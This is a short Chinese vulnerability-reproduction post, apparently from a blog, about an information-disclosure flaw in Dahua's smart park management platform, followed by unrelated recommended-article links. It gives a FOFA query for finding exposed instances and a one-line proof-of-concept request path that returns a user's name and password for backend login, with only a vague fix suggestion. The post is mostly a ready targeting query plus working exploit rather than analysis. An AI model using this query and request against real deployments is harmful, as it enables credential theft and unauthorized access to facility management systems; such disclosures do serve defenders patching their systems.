【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

复制代码
/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
whyfail16 分钟前
CVE-2026-39363-Vite开发服务器安全漏洞深度分析
安全·vite
Y学院30 分钟前
网络安全基础核心知识点教程
网络·web安全·php
amao99881 小时前
系统安全-概述
安全·系统安全
阿赛工作室1 小时前
符合欧盟安全标准的 Node.js + Vue3 全栈架构设计
安全·node.js
yngsqq1 小时前
编译的dll自动复制到指定目录并重命名
java·服务器·前端
聊点儿技术2 小时前
IP风险等级评估在保险承保中的三个核心应用场景——从投保核验到持续监控
服务器·金融·ip·保险·ip风险评估·ip风险等级·风险评估api
QC·Rex2 小时前
Kubernetes 生产环境调试安全最佳实践:2026 年完整指南
安全·贪心算法·kubernetes
风曦Kisaki2 小时前
#企业级网络架构Day01:网络概述,网络参考模型,交换机命令行
网络·架构·智能路由器
德迅云安全-小潘2 小时前
游戏行业网络安全态势分析与应对
安全·web安全·游戏
大熊背2 小时前
Serial over TCP实现原理
网络·tcp·isppipeline